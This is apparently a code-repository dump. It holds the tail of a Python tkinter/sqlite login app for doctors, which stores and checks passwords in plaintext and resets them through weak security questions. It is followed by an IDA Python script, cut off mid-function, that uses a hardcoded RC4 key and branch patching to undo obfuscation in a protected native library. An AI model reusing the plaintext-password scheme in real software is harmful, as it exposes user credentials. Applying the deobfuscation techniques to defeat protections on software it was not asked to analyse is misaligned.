userinfo.place(x=0,y=5)\n \n helLO = Label(userinfo,background='white',text='Hello:',font='-size 18')\n helLO.place(x=5,y=5)\n\n DrName = Label(userinfo,background='white',text=N,font='-size 18',fg='#006f50')\n DrName.place(x=75,y=5)\n\n regNO = Label(userinfo,background='white',text='Registeration Number:',font='-size 18')\n regNO.place(x=1150,y=5)\n\n REgNo = Label(userinfo,background='white',text=R,font='-size 18',fg='#006f50')\n REgNo.place(x=1400,y=5)\n\n DrDgr = Label(userinfo,background='white',text=Dg,font='-size 18',fg='#006f50')\n DrDgr.place(x=5,y=45)\n\n Phnolbl = Label(userinfo,background='white',text='Phone Number:',font='-size 18')\n Phnolbl.place(x=1150,y=45)\n\n PhnNo = Label(userinfo,background='white',text=Ph,font='-size 18',fg='#006f50')\n PhnNo.place(x=1330,y=45)\n\n DrDgr = Label(userinfo,background='white',text=C,font='-size 18',fg='#006f50')\n DrDgr.place(x=5,y=85)\n\n chngbtn = Button(userinfo,text='Change',cursor='hand2',background='#006F50',foreground='#ffffff',font='-size 15',height=0,width=8,command=ChAngE)\n chngbtn.place(x=1150,y=85)\n\n LogouT = Button(userinfo,text='Sign Out',cursor='hand2',background='#006F50',foreground='#ffffff',font='-size 15',height=0,width=8,command=LogOut)\n LogouT.place(x=1422,y=85)\n\n CrtNwPrscrpn= Button(loggedinframe,text='Create\\nNew\\nVoice\\nPrescription',cursor='hand2',background='#006F50',foreground='#ffffff',font='-size 18',height=4,width=10,command=cnvpcall)\n CrtNwPrscrpn.place(x=50,y=335)\n\n hst = sqlite3.connect('drtalk')\n hcr = hst.cursor()\n hcr.execute(\"\"\"select * from ps where DrregNO=?\"\"\",[R])\n hst.commit()\n res = hcr.fetchall()\n hst.close()\n\n HistoryFrame = Listbox(loggedinframe,bg='#ffffff',font='-size 18')\n HistoryFrame.place(x=250,y=170,height=475,width=1283)\n\n scroLLbar = Scrollbar(HistoryFrame,jump=0)\n scroLLbar.pack(side=RIGHT,fill=Y)\n\n for row in res:\n NameVAR=row[0]\n GendVAR=row[1]\n AgeVAR=row[2]\n SymptVAR=row[3]\n DiagVAR=row[4]\n PrscVAR=row[5]\n AdvVAR=row[6]\n PrnoVAR=row[8]\n HistoryFrame.insert(END, f\"Name:{NameVAR} Gender:{GendVAR} Age:{row[2]} Document Name:{PrnoVAR}\")\n HistoryFrame.insert(END,'')\n HistoryFrame.config(yscrollcommand=scroLLbar.set)\n scroLLbar.config(command=HistoryFrame.yview)\n\ndef FPass():\n usname = StringVar()\n Passwd = StringVar()\n Avn = StringVar()\n Tu = StringVar()\n Tre = StringVar()\n PasswdPattern=r'(?=.*\\d)(?=.*[a-z])(?=.*[A-Z])(?=.*\\W)'\n def cpdata():\n docdb = sqlite3.connect('drtalk')\n drcr = docdb.cursor()\n drcr.execute(\"\"\"select * from drs where Uname=?\"\"\",[usname.get()])\n docdb.commit()\n res=drcr.fetchall()\n docdb.close()\n for row in res:\n AOne=row[11]\n ATwo=row[12]\n AThr=row[13]\n if AOne==Avn.get() and ATwo==Tu.get() and AThr==Tre.get() and re.match(PasswdPattern,Passwd.get()):\n docdb = sqlite3.connect('drtalk')\n drcr = docdb.cursor()\n drcr.execute(\"\"\"UPDATE drs SET Passwd=? where Uname=?\"\"\",[Passwd.get(),usname.get()])\n docdb.commit()\n docdb.close()\n window.destroy()\n else:\n messagebox.showinfo(\"Wrong Entries\", \"Please Enter Informations in correct format\")\n\n fpassframe = Frame(window,bg='#ffffff',height=649,width=1536,background='#ffffff')\n fpassframe.place(x=0,y=191)\n \n unam = Label(fpassframe,background='white',text='Username',font='-size 18 -weight bold')\n unam.place(x=590,y=50)\n\n usrname = Entry(fpassframe,textvariable=usname,background='#ffffff',font='-size 17',borderwidth=2,relief='groove')\n usrname.place(x=750,y=52)\n\n QaA = LabelFrame(fpassframe,text='Question and Answers:',font='-size 18 -weight bold',bd=6,bg='#ffffff',height=285,width=1535)\n QaA.place(x=0,y=130)\n\n Ques1 = Label(QaA,background='white',text='Q1) What is your Nickname? (All words must be in capital letters)',font='-size 18')\n Ques1.place(x=0,y=5)\n\n Answ1 = Entry(QaA,background='#ffffff',textvariable=Avn,font='-size 17',width=61)\n Answ1.place(x=710,y=5)\n\n Ques2 = Label(QaA,background='white',text='Q2) Which city you love the most? (All words must be in capital letters)',font='-size 18')\n Ques2.place(x=0,y=110)\n\n Answ2 = Entry(QaA,background='#ffffff',textvariable=Tu,font='-size 17',width=57)\n Answ2.place(x=764,y=110)\n\n Ques3 = Label(QaA,background='white',text='Q3) What is the name of your first school? (All words must be in capital letters)',font='-size 18')\n Ques3.place(x=0,y=205)\n\n Answ3 = Entry(QaA,background='#ffffff',textvariable=Tre,font='-size 17',width=50)\n Answ3.place(x=855,y=207)\n\n npaSS = Label(fpassframe,background='white',text='New Password:',font='-size 18 -weight bold')\n npaSS.place(x=570,y=450)\n\n npass = Entry(fpassframe,textvariable=Passwd,background='#ffffff',font='-size 17',borderwidth=2,relief='groove')\n npass.place(x=750,y=452)\n\n confirM = Button(fpassframe,text='Confirm',cursor='hand2',background='#006F50',foreground='#ffffff',font='-size 17',height=1,width=10,command=cpdata)\n confirM.place(x=600,y=570)\n\n SiGnin = Button(fpassframe,text='Back',cursor='hand2',background='#006F50',foreground='#ffffff',font='-size 17',height=1,width=10,command=signinfn)\n SiGnin.place(x=800,y=570)\n\ndef signinfn():\n uname = StringVar()\n passwd = StringVar()\n\n def FPaSs():\n FPass()\n \n def signin():\n docdb = sqlite3.connect('drtalk')\n drcr = docdb.cursor()\n drcr.execute(\"\"\"select * from drs where Uname=?\"\"\",[uname.get()])\n docdb.commit()\n res=drcr.fetchall()\n docdb.close()\n for row in res:\n NAme=row[0]\n GNdr=row[1]\n DOb=row[2]\n PHno=row[3]\n EId=row[4]\n RGno=row[5]\n EXp=row[6]\n CLn=row[7]\n DGr=row[8]\n UName=row[9]\n PAsswd=row[10]\n AOne=row[11]\n ATwo=row[12]\n AThr=row[13]\n try:\n if PAsswd == passwd.get():\n loggedin(NAme,GNdr,DOb,PHno,EId,RGno,EXp,CLn,DGr,UName,PAsswd,AOne,ATwo,AThr)\n except UnboundLocalError:\n messagebox.showinfo(\"Unknown Entry\", \"No records available at this username.\\nPlease get registerd.\")\n \n signinframe = Frame(window,bg='#ffffff',height=649,width=1536,background='#ffffff')\n signinframe.place(x=0,y=191)\n \n unam = Label(signinframe,background='white',text='Username',font='-size 18 -weight bold')\n unam.place(x=590,y=30)\n\n usrname = Entry(signinframe,background='#ffffff',textvariable=uname,font='-size 17',borderwidth=2,relief='groove')\n usrname.place(x=750,y=30)\n\n pas = Label(signinframe,background='white',text='Password',font='-size 18 -weight bold')\n pas.place(x=590,y=100)\n\n paswd = Entry(signinframe,background='#ffffff',textvariable=passwd,font='-size 17',borderwidth=2,relief='groove',show=\"*\")\n paswd.place(x=750,y=100)\n\n sgnin = Button(signinframe,text='Sign in',cursor='hand2',background='#006F50',foreground='#ffffff',font='-size 17',height=1,width=10,command=signin)\n sgnin.place(x=640,y=170)\n\n sgnup = Button(signinframe,text='Sign up',cursor='hand2',background='#006F50',foreground='#ffffff',font='-size 17',height=1,width=10,command=signupfn)\n sgnup.place(x=805,y=170)\n\n fpass = Label(signinframe,background='white',text='Forgot password ~~>',font='-size 14')\n fpass.place(x=590,y=245)\n\n fpbtn = Button(signinframe,text='Click Here',cursor='hand2',background='#006F50',foreground='#ffffff',font='-size 14',height=1,width=15,command=FPaSs)\n fpbtn.place(x=805,y=240)\n\ndef signupfn():\n fname = StringVar()\n gendr = StringVar()\n dob = StringVar()\n phoneno = StringVar()\n eid = StringVar()\n regno = StringVar()\n exp = StringVar()\n cln = StringVar()\n dgr = StringVar()\n uname = StringVar()\n passwd = StringVar()\n aone = StringVar()\n atwo = StringVar()\n athr = StringVar()\n\n def signup():\n nmatch=0\n gmatch=0\n dobmatch=0\n phnomatch=0\n eidmatch=0\n regnomatch=0\n expmatch=0\n dgrmatch=0\n passwdmatch=0\n aonematch=0\n atwomatch=0\n athrmatch=0\n NamePattern=r'[a-zA-Z]|\\.'\n if re.match(NamePattern,fname.get()):\n nmatch=1\n else:\n nmatch=0\n GenderPattern=r'Male|Female|Others'\n if re.match(GenderPattern,gendr.get()):\n gmatch=1\n else:\n gmatch=0\n DobPattern=r'\\d{2}/\\d{2}/\\d{4}'\n if re.match(DobPattern,dob.get()):\n dobmatch=1\n else:\n dobmatch=0\n PhnoPattern=r'\\d{10}'\n if re.match(PhnoPattern,phoneno.get()):\n phnomatch=1\n else:\n phnomatch=0\n EidPattern=r'[a-zA-Z0-9.]*@[a-zA-Z]*\\.com'\n if re.match(EidPattern,eid.get()):\n eidmatch=1\n else:\n eidmatch=0\n RegnoPattern=r'\\d{6}'\n if re.match(RegnoPattern,regno.get()):\n regnomatch=1\n else:\n regnomatch=0\n ExpPattern=r'\\d{2}'\n if re.match(ExpPattern,exp.get()):\n expmatch=1\n else:\n expmatch=0\n DgrPattern=r'[a-zA-Z0-9. -]'\n if re.match(DgrPattern,dgr.get()):\n dgrmatch=1\n else:\n dgrmatch=0\n PasswdPattern=r'(?=.*\\d)(?=.*[a-z])(?=.*[A-Z])(?=.*\\W)'\n if re.match(PasswdPattern,passwd.get()):\n passwdmatch=1\n else:\n passwdmatch=0\n AnsPattern=r'[A-Z]+'\n if re.match(AnsPattern,aone.get()):\n aonematch=1\n else:\n aonematch=0\n if re.match(AnsPattern,atwo.get()):\n atwomatch=1\n else:\n atwomatch=0\n if re.match(AnsPattern,athr.get()):\n athrmatch=1\n else:\n athrmatch=0\n if nmatch and gmatch and dobmatch and phnomatch and eidmatch and regnomatch and expmatch and dgrmatch and passwdmatch and aonematch and atwomatch and athrmatch==1:\n print('Matched')\n docdb = sqlite3.connect('drtalk')\n drcr = docdb.cursor()\n drcr.execute(\"\"\"create table if not exists drs(Name VARCHAR,Gender VARCHAR,Dob VARCHAR,PhoneNo VARCHAR UNIQUE,Eid VARCHAR UNIQUE,RegNo VARCHAR UNIQUE,Exp VARCHAR,Cln VARCHAR,Dgr VARCHAR,Uname VARCHAR PRIMARY KEY,Passwd VARCHAR,Aone VARCHAR,Atwo VARCHAR,Athr VARCHAR)\"\"\")\n drcr.execute(\"\"\"insert into drs VALUES(?,?,?,?,?,?,?,?,?,?,?,?,?,?)\"\"\",(fname.get(), gendr.get(), dob.get(), phoneno.get(), eid.get(), regno.get(), exp.get(), cln.get(), dgr.get(), uname.get(), passwd.get(), aone.get(), atwo.get(), athr.get()))\n docdb.commit()\n docdb.close()\n signinfn()\n else:\n print('Not Matched')\n messagebox.showinfo(\"Wrong Entries\", \"Please Enter Informations in correct format\")\n \n signupframe = Frame(window,bg='#ffffff',height=649,width=1536,background='#ffffff')\n signupframe.place(x=0,y=191)\n \n personalinfo = LabelFrame(signupframe,text='Personal Information:',font='-size 18 -weight bold',bd=6,bg='#ffffff',height=130,width=1535)\n personalinfo.place(x=0,y=5)\n\n nam = Label(personalinfo,text='Fullname:',bg='#ffffff',font='-size 18')\n nam.place(x=5,y=5)\n\n nme = Entry(personalinfo,bg='#ffffff',textvariable=fname,font='-size 17',width=107)\n nme.place(x=119,y=7)\n\n gndr = Label(personalinfo,text='Gender:',bg='#ffffff',font='-size 18')\n gendrbtn1 = Radiobutton(personalinfo,text='Male',tristatevalue='x',bg='#ffffff',variable=gendr,value='Male',font='-size 16')\n gendrbtn2 = Radiobutton(personalinfo,text='Female',tristatevalue='x',bg='#ffffff',variable=gendr,value='Female',font='-size 16')\n gendrbtn3 = Radiobutton(personalinfo,text='Others',tristatevalue='x',bg='#ffffff',variable=gendr,value='Others',font='-size 16')\n gndr.place(x=5,y=45)\n gendrbtn1.place(x=100,y=44)\n gendrbtn2.place(x=180,y=44)\n gendrbtn3.place(x=286,y=44)\n\n DoB = Label(personalinfo,text='D.O.B (dd/mm/yyyy):',bg='#ffffff',font='-size 18')\n DoB.place(x=395,y=45)\n Dob = Entry(personalinfo,bg='#ffffff',textvariable=dob,font='-size 17',width=9)\n Dob.place(x=628,y=47)\n\n Phn = Label(personalinfo,text='Contact Number:',bg='#ffffff',font='-size 18')\n Phn.place(x=760,y=45)\n Phno = Entry(personalinfo,bg='#ffffff',textvariable=phoneno,font='-size 17',width=10)\n Phno.place(x=950,y=47)\n\n Eml = Label(personalinfo,text='Email Id:',bg='#ffffff',font='-size 18')\n Eml.place(x=1110,y=45)\n Email = Entry(personalinfo,bg='#ffffff',textvariable=eid,font='-size 17',width=23)\n Email.place(x=1210,y=47)\n\n professionalinfo = LabelFrame(signupframe,text='Professional Information:',font='-size 18 -weight bold',bd=6,bg='#ffffff',height=130,width=1535)\n professionalinfo.place(x=0,y=140)\n\n Regno = Label(professionalinfo,text='Registeration Number:',bg='#ffffff',font='-size 18')\n Regno.place(x=0,y=5)\n\n RegNo = Entry(professionalinfo,bg='#ffffff',textvariable=regno,font='-size 17',width=6)\n RegNo.place(x=250,y=7)\n\n ExP = Label(professionalinfo,text='Experience (In Years):',bg='#ffffff',font='-size 18')\n ExP.place(x=350,y=5)\n\n Exp = Entry(professionalinfo,bg='#ffffff',textvariable=exp,font='-size 17',width=2)\n Exp.place(x=595,y=7)\n\n ClN = Label(professionalinfo,text='Clinic Name:',bg='#ffffff',font='-size 18')\n ClN.place(x=644,y=5)\n\n Cln = Entry(professionalinfo,bg='#ffffff',textvariable=cln,font='-size 17',width=55)\n Cln.place(x=793,y=7)\n\n DgR = Label(professionalinfo,text='Education Qualification:',bg='#ffffff',font='-size 18')\n DgR.place(x=0,y=45)\n\n Dgr = Entry(professionalinfo,bg='#ffffff',textvariable=dgr,font='-size 17',width=96)\n Dgr.place(x=260,y=47)\n\n UsrNme = Label(signupframe,text='Username:',font='-size 18 -weight bold',bg='#ffffff')\n UsrNme.place(x=4,y=270)\n\n usernam = Entry(signupframe,background='#ffffff',textvariable=uname,font='-size 17',width=48)\n usernam.place(x=130,y=274)\n\n pas = Label(signupframe,background='white',text='Password:',font='-size 18 -weight bold')\n pas.place(x=760,y=270)\n\n psswd = Entry(signupframe,background='#ffffff',textvariable=passwd,font='-size 17',width=48)\n psswd.place(x=890,y=274)\n\n tac = LabelFrame(signupframe,text='Terms and Condition:',font='-size 18 -weight bold',bd=6,bg='#ffffff',height=285,width=1535)\n tac.place(x=0,y=307)\n\n fpaes1 = Label(tac,text='By chance if you forgot your password then by clicking on forgot password, You have answer the below given questions and you can change',bg='#ffffff',font='-size 18')\n fpaes1.place(x=0,y=5)\n\n fpaes2 = Label(tac,text='your password. Another thing is the application will accept only those Email Ids which are based on .com servers so you must enter only tho-',bg='#ffffff',font='-size 18')\n fpaes2.place(x=0,y=45)\n\n fpaes3 = Label(tac,text='-se emails having .com at end. Your password must contain set of numbers, letters (both Capital and small) and special symbols.',bg='#ffffff',font='-size 18')\n fpaes3.place(x=0,y=85)\n\n Ques1 = Label(tac,background='white',text='Q1) What is your Nickname? (All words must be in capital letters)',font='-size 18')\n Ques1.place(x=0,y=125)\n\n Answ1 = Entry(tac,background='#ffffff',textvariable=aone,font='-size 17',width=61)\n Answ1.place(x=710,y=127)\n\n Ques2 = Label(tac,background='white',text='Q2) Which city you love the most? (All words must be in capital letters)',font='-size 18')\n Ques2.place(x=0,y=165)\n\n Answ2 = Entry(tac,background='#ffffff',textvariable=atwo,font='-size 17',width=57)\n Answ2.place(x=764,y=167)\n\n Ques3 = Label(tac,background='white',text='Q3) What is the name of your first school? (All words must be in capital letters)',font='-size 18')\n Ques3.place(x=0,y=205)\n\n Answ3 = Entry(tac,background='#ffffff',textvariable=athr,font='-size 17',width=50)\n Answ3.place(x=855,y=207)\n\n preV = Button(signupframe,text='Sign In',cursor='hand2',background='#006F50',foreground='#ffffff',font='-size 17',height=1,width=10,command=signinfn)\n preV.place(x=5,y=596)\n\n Prev = Label(signupframe,background='white',text='(Previous)',font='-size 18')\n Prev.place(x=150,y=601)\n\n Nxt = Button(signupframe,text='Sign Up',cursor='hand2',background='#006F50',foreground='#ffffff',font='-size 17',height=1,width=10,command=signup)\n Nxt.place(x=1390,y=596)\n\n nxT = Label(signupframe,background='white',text='(Next)',font='-size 18')\n nxT.place(x=1315,y=601) \n\nsigninfn()\n\nwindow.mainloop()\n"
}
] | 1 |
lin1man/sgmainRev | https://github.com/lin1man/sgmainRev | 74865f71237de7832bcdc4f380f494c0945b481f | fe5eda399dc57ab66dee8b6d930e6e6b46f3b998 | b761a48157800bb43a601a0a51d459664e87e8bf | refs/heads/master | 2022-11-14T14:23:21.027563 | 2020-07-07T07:12:37 | 2020-07-07T07:12:37 | 29,680,614 | 1 | 5 | null | null | null | null | null | [
{
"alpha_fraction": 0.38854336738586426,
"alphanum_fraction": 0.48794326186180115,
"avg_line_length": 42.931373596191406,
"blob_id": "60abde779a246773494d459e004ef2fc139f8951",
"content_id": "f33b8fdb02e5efef0947c6483c5586a52eb8ce22",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 18330,
"license_type": "no_license",
"max_line_length": 149,
"num_lines": 408,
"path": "/patch.py",
"repo_name": "lin1man/sgmainRev",
"src_encoding": "UTF-8",
"text": "from idc import *\r\nfrom idaapi import *\r\nfrom idautils import *\r\nfrom Crypto.Cipher import ARC4\r\nfrom capstone import *\r\nfrom capstone.arm import *\r\n\r\ndef str_bytearray(str):\r\n return ' '.join(hex(x) for x in bytearray(str))\r\n\r\ndef put_unconditional_branch(source, destination):\r\n offset = (destination - source - 4) >> 1\r\n if offset > 2097151 or offset < -2097152: # 0x200000 2MB\r\n raise RuntimeError(\"Invalid offset\")\r\n if offset > 1023 or offset < -1024:\r\n instruction1 = 0xf000 | ((offset >> 11) & 0x7ff)\r\n instruction2 = 0xb800 | (offset & 0x7ff)\r\n patch_word(source, instruction1)\r\n patch_word(source + 2, instruction2)\r\n else:\r\n instruction = 0xe000 | (offset & 0x7ff)\r\n patch_word(source, instruction)\r\n\r\n\r\ndef put_bl_branch(source, destination):\r\n offset = (destination - source - 4 - 2) >> 1 #4 for pc, 2 for PUSH {LR}\r\n if offset > 2097151 or offset < -2097152: # 0x200000 2MB\r\n raise RuntimeError(\"Invalid offset\")\r\n instruction1 = 0xb500 #PUSH {LR}\r\n instruction2 = 0xf000 | ((offset >> 11) & 0x7ff) #BL imm10\r\n instruction3 = 0xf800 | (offset & 0x7ff) #BL imm11 imm32=signExtend(s:0:0:imm10:imm11:'0',32)\r\n instruction4 = 0xbd00 #PUSH {PC}\r\n patch_word(source, instruction1)\r\n patch_word(source+2, instruction2)\r\n patch_word(source+4, instruction3)\r\n patch_word(source+6, instruction4)\r\n\r\n\r\n\r\ndef rc4Decrypt():\r\n ea = here()\r\n length = ask_long(1,\"Specify length\")\r\n if length > 1:\r\n rc4 = ARC4.new(\"DcO/lcK+h?m3c*q@\")\r\n str = rc4.decrypt(get_bytes(ea, length))\r\n MakeComm(ea, str)\r\n\r\n\r\ndef cs_disasm(arch, mode, code, offset):\r\n try:\r\n md = Cs(arch, mode)\r\n md.detail = True\r\n inss = []\r\n for insn in md.disasm(code, offset):\r\n inss.append(insn)\r\n return inss\r\n except CsError as e:\r\n return None\r\n\r\ndef cs_arm_thumb(code, offset=0x80000000):\r\n return cs_disasm(CS_ARCH_ARM, CS_MODE_THUMB, code, offset)\r\n\r\n\r\ndef cs_arm_arm(code, offset=0x80000000):\r\n return cs_disasm(CS_ARCH_ARM, CS_MODE_ARM, code, offset)\r\n\r\ndef plog(msg):\r\n print(msg)\r\n\r\ndef plogi(ea, msg):\r\n plog(\"[Info ] %08x : %s\" % (ea, msg))\r\n\r\ndef plogic(ea, msg):\r\n MakeCode(ea)\r\n plog(\"[Info ] %08x : %s\" % (ea, msg))\r\n\r\ndef plogw(ea, msg):\r\n plog(\"[Warn ] %08x : %s\" % (ea, msg))\r\n\r\ndef ploge(ea, msg):\r\n plog(\"[Error] %08x : %s\" % (ea, msg))\r\n\r\ndef align_down(x, size=4):\r\n return x & ~(size - 1)\r\n\r\ndef align_up(x, size=4):\r\n return (x + size - 1) & ~(size - 1)\r\n\r\ndef get_s8(val):\r\n if val < 0x80:\r\n return val\r\n else:\r\n return (val - 0x100)\r\n\r\ndef get_s16(val):\r\n if val < 0x8000:\r\n return val\r\n else:\r\n return (val - 0x10000)\r\n\r\ndef get_s24(val):\r\n if val < 0x800000:\r\n return val\r\n else:\r\n return (val - 0x1000000)\r\n\r\ndef get_s32(val):\r\n if val < 0x80000000:\r\n return val\r\n else:\r\n return (val - 0x100000000)\r\n\r\ndef getAdrRegValueT1(ins): #ADR Rd,# 10100dddmmmmmmmm Rd=(ddd) mmmmmmmm:'00'\r\n return ((ins & 0x0700) >> 8), ((ins & 0xff) << 2)\r\n\r\ndef getSubsRegValueT2(ins): #SUBS Rdn,#<imm8> 00111{nnn}{imm8}\r\n return ((ins & 0x0700) >> 8), (ins & 0xff)\r\n\r\ndef getAddsRegValueT2(ins): #ADDS Rdn,#<imm8> 00110{nnn}{imm8}\r\n return ((ins & 0x0700) >> 8), (ins & 0xff)\r\n\r\ndef getLdrRegValueT1(ins): #LDR Rn,#<imm8:'00'>\r\n return ((ins & 0x0700) >> 8), ((ins & 0xff) << 2)\r\n\r\ndef patchPushSubsAdds(ea):\r\n if get_wide_word(ea) == 0xb507 and get_wide_word(ea+18) == 0xbd07: #PUSH {R0-R2,LR} POP {R0-R2,PC}\r\n ins1 = get_wide_word(ea+2) #ADR Rn,#<imm8>\r\n ins2 = get_wide_word(ea+6) #SUBS Rn,#<imm8>\r\n ins3 = get_wide_word(ea+14) #ADDS Rn,#<imm8>\r\n ins4 = get_wide_word(ea+16) #STR Rn,[SP,#<imm8>]\r\n address = ea+4\r\n # ADR Rn,#imm1 STR Rn,[SP,#0xc] STR(T2):10010{ttt}{imm8} STR Rt,[sp,imm8:'00'}\r\n if (ins1 & 0xa800) == 0xa000 and (ins4 & 0xf8ff) == 0x9003:\r\n if (ins2 & 0xf800) == 0x3800 and (ins3 & 0xf800) == 0x3000: #SUBS ADDS\r\n reg1,imm1 = getAdrRegValueT1(ins1)\r\n reg2,imm2 = getSubsRegValueT2(ins2)\r\n reg3,imm3 = getAddsRegValueT2(ins3)\r\n if reg1 != 1 or reg2 != 1 or reg3 != 0:\r\n plogw(ea, \"reg umatch %d %d %d\" % (reg1, reg2, reg3))\r\n address += imm1\r\n address -= imm2\r\n address += imm3\r\n put_unconditional_branch(ea, address)\r\n plogic(ea, \"patch push sub add\")\r\n else:\r\n ploge(ea,\" may be can patch by patchPushSubsAdds\")\r\n\r\ndef patch494c(ea):\r\n if get_wide_word(ea) == 0xb503: #PUSH {R0,R1,LR}\r\n ea1 = ea + 2\r\n if get_wide_word(ea1) == 0xbf00: #NOP\r\n ea1 += 2\r\n ins1 = get_wide_word(ea1)\r\n if (ins1 & 0xff00) == 0x4800: #LDR R0,=XX\r\n reg1,imm1 = getLdrRegValueT1(ins1) #LDR R0,\r\n index = get_wide_dword(align_up(ea1+2+imm1))\r\n ea1 += 2\r\n ins2 = get_wide_word(ea1)\r\n ins2_dw = get_wide_dword(ea1)\r\n table = None\r\n if (ins2 & 0xff00) == 0x4900: #LDR R1,=xxx\r\n ea1 +=2\r\n inss = cs_arm_thumb(get_bytes(ea1,4), ea1)\r\n if inss:\r\n if inss[0].operands[0].imm == 0x494c:\r\n table = ea1 + 4\r\n if table == None:\r\n ploge(ea, \"may be bl 494c,but not find BLX 494c\")\r\n elif (ins2_dw & 0xc000f800) == 0xc000f000: #BL T1 11110S{imm10} 11{j1}1{j2}{imm11} BLX T2 11110S{imm10H} 11{j1}0{j2}{imm10L}H\r\n inss = cs_arm_thumb(get_bytes(ea1,4), ea1)\r\n if inss:\r\n blInsEa = inss[0].operands[0].imm\r\n inss2 = cs_arm_thumb(get_bytes(blInsEa, 4), blInsEa)\r\n if inss2:\r\n if inss2[0].operands[0].imm == 0x494c:\r\n table = blInsEa + 4\r\n if table == None:\r\n ploge(ea, \"may be bl 494c,but find bl 494c error\")\r\n if table:\r\n offset = get_wide_dword(table + (index << 2))\r\n put_unconditional_branch(ea, table + offset)\r\n plogic(ea, \"patch BLX 494c\")\r\n\r\ndef patchPushAdrBLAddsPop(ea):\r\n ins1 = get_wide_word(ea)\r\n if (ins1 & 0xf700) == 0xb500 and (get_wide_word(ea+16) & 0xf7ff) == ins1: #PUSH {X-X,LR} POP {X-X,PC}\r\n if get_wide_dword(ea+6) == 0xf800f000: #BL 0\r\n ins2 = get_wide_word(ea+2)\r\n ins3 = get_wide_word(ea+10)\r\n if (ins3 & 0xf800) == 0x3000: #ADDS\r\n reg2,imm2 = getAdrRegValueT1(ins2)\r\n reg3,imm3 = getAddsRegValueT2(ins3)\r\n if reg2 != reg3:\r\n ploge(ea, \"may be Push BL 0 Pop,but reg not equal\")\r\n else:\r\n address = ea + 4 + imm2 + imm3\r\n put_unconditional_branch(ea, address)\r\n plogic(ea, \"patch Push BL 0 Pop\")\r\n else:\r\n ploge(ea, \"may be Push BL 0 Pop\")\r\n\r\ndef patchPushAdrMovsBeqBne(ea):\r\n if (get_wide_word(ea) & 0xff00) == 0xb500:\r\n ins1 = get_wide_word(ea+12)\r\n ins2 = get_wide_word(ea+14)\r\n if (ins1 & 0xff00) == 0xd000 and (ins2 & 0xff00) == 0xd100: #BEQ BNE\r\n if (ins1 & 0xfe) == (ins2 & 0xfe): # BNE BEQ to same\r\n ins3 = get_wide_word(ea + 2) #ADR R4,\r\n ins4 = get_wide_word(ea + 4) #MOVS R5,#2\r\n ins5 = get_wide_word(ea + 6) #ADDS R5,#n\r\n reg3,imm3 = getAdrRegValueT1(ins3)\r\n if ins4 != 0x2502 or reg3 != 4 or (ins5 & 0xff00) != 0x3500:\r\n plogw(ea, \"may be Push Adr Movs Beq Bne but not ADR R4,#x MOVS R5,#n\")\r\n address = ea + 4 + imm3 + (ins4 & 0xff) + (ins5 & 0xff)\r\n put_unconditional_branch(ea, address)\r\n plogic(ea, \"patch Push Adr Movs Beq Bne\")\r\n else:\r\n plogw(ea, \"may be Push Adr Movs Beq Bne\")\r\n\r\ndef patchSubPushBlx4964(ea):\r\n patches = {}\r\n # LDR(literal) T1 01001ttt{imm8} LDR Rt,<label> pc+imm8:'00'\r\n # LDR(immediate) T1 01101{imm5}nnnttt LDR Rt,[Rn{,#<imm>}] imm32=imm5:'00'\r\n # B T2 11100{imm11} B <label> imm32=imm11:'0'\r\n patches[0] = (0x01,0x48,0x00,0x68) #,0x02,0xe0\r\n patches[1] = (0x01,0x49,0x09,0x68) #,0x02,0xe0\r\n patches[2] = (0x01,0x4a,0x12,0x68) #,0x02,0xe0\r\n patches[3] = (0x01,0x4b,0x1b,0x68) #,0x02,0xe0\r\n patches[4] = (0x01,0x4c,0x24,0x68) #,0x02,0xe0\r\n patches[5] = (0x01,0x4d,0x2d,0x68) #,0x02,0xe0\r\n patches[6] = (0x01,0x4e,0x36,0x68) #,0x02,0xe0\r\n patches[7] = (0x01,0x4f,0x3f,0x68) #,0x02,0xe0\r\n # LDR(literal) T2 11111000 U1011111 tttt{imm12} LDR Rt,<label>\r\n # LDR(immediate) T3 11111000 1101nnnn tttt{imm12} LDR Rt,[Rn{,#<imm12>}]\r\n # B T2 11100{imm11} B <label> imm32=imm11:'0'\r\n patches[8] = (0xdf,0xf8,0x08,0x80,0xd8,0xf8,0x00,0x80) #,0x01,0xe0\r\n patches[9] = (0xdf,0xf8,0x08,0x90,0xd9,0xf8,0x00,0x90) #,0x01,0xe0\r\n patches[10] = (0xdf,0xf8,0x08,0xa0,0xda,0xf8,0x00,0xa0) #,0x01,0xe0\r\n patches[11] = (0xdf,0xf8,0x08,0xb0,0xdb,0xf8,0x00,0xb0) #,0x01,0xe0\r\n patches[12] = (0xdf,0xf8,0x08,0xc0,0xdc,0xf8,0x00,0xc0) #,0x01,0xe0\r\n patches[13] = (0xdf,0xf8,0x08,0xd0,0xdd,0xf8,0x00,0xd0) #,0x01,0xe0\r\n patches[14] = (0xdf,0xf8,0x08,0xe0,0xde,0xf8,0x00,0xe0) #,0x01,0xe0\r\n if get_wide_word(ea) == 0xb082 and get_wide_word(ea+2) == 0xb503: #SUB SP,SP,#8 PUSH {R0,R1,LR}\r\n ins1 = get_wide_dword(ea+4)\r\n if (ins1 & 0xc000f800) == 0xc000f000: # BL T1 11110S{imm10} 11{j1}1{j2}{imm11} BLX T2 11110S{imm10H} 11{j1}0{j2}{imm10L}H\r\n ea1 = ea + 4\r\n inss = cs_arm_thumb(get_bytes(ea1, 4), ea1)\r\n if inss:\r\n blInsEa = inss[0].operands[0].imm\r\n if blInsEa == 0x4964:\r\n if (get_wide_word(ea+12) & 0xff00) == 0xbc00: # POP {Rn}\r\n register = -1\r\n r = get_wide_byte(ea+12)\r\n for i in range(8):\r\n if r == (1 << i):\r\n register = i\r\n break\r\n if register == -1:\r\n ploge(ea, \"BLX 4964 register detect error:{%02x}\" % r)\r\n else:\r\n address = get_wide_dword(ea+8)+ea+8\r\n ea3 = ea\r\n if (ea3 % 4) == 0:\r\n patch_word(ea3, 0xbf00) # nop\r\n ea3 += 2\r\n for b in patches[register]:\r\n patch_byte(ea3, b)\r\n ea3 += 1\r\n if (ea3 - ea) == 4: #total:14\r\n patch_word(ea3, 0xe003) #BL 3*2+2 address+4\r\n elif (ea3 - ea) == 6: #total:14\r\n patch_word(ea3, 0xe002)\r\n else: #show not exist\r\n ploge(ea, \"patch BLX 4964 error\")\r\n return\r\n ea3 += 2\r\n patch_dword(ea3, address)\r\n plogic(ea, \"patch BLX 4964\")\r\n else:\r\n ins2 = get_wide_dword(ea+12)\r\n #LDR T4 11111000 0101nnnn tttt1PUW{imm8}\r\n if (ins2 & 0x0fffffff) == 0x0b04f85d: 